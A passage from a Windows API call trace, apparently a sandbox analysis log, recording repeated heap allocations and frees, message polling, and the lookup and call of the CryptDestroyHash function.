returned 0x2e51508 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51508 | out: hHeap=0x970000) returned 1 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51418 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51418 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51898 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51898 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.388] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51778 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51838 [0222.388] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51838 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51778 | out: hHeap=0x970000) returned 1 [0222.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0222.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51820 [0222.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51808 [0222.389] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51808 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51820 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e515b0 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.389] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513d0 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513b8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51538 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977c08 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51340 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.390] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0222.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.391] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0222.391] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.391] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0222.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0222.558] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.558] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0222.558] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0222.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b08 | out: hHeap=0x970000) returned 1 [0222.559] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ba8 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51250 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51010 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51028 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51160 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0222.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510e8 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511a8 [0222.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51268 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51298 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51178 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55048 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.561] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0222.561] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55078 [0222.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0222.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0222.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0222.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0222.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0222.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0222.562] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0222.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51580 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51370 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514f0 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0222.563] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0222.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x11) returned 0x2e69bc8 [0222.564] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69bc8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f440 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0222.564] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyHash") returned 0x756ff0e0 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55008 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0222.564] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51568 | out: hHeap=0x970000) returned 1 [0222.564] CryptDestroyHash (hHash=0xa87510) returned 1 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0222.564] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fb8 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51478 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51430 [0222.565] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51460 | out: hHeap=0x970000) returned 1 [0222.565] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512e0 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0222.566] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 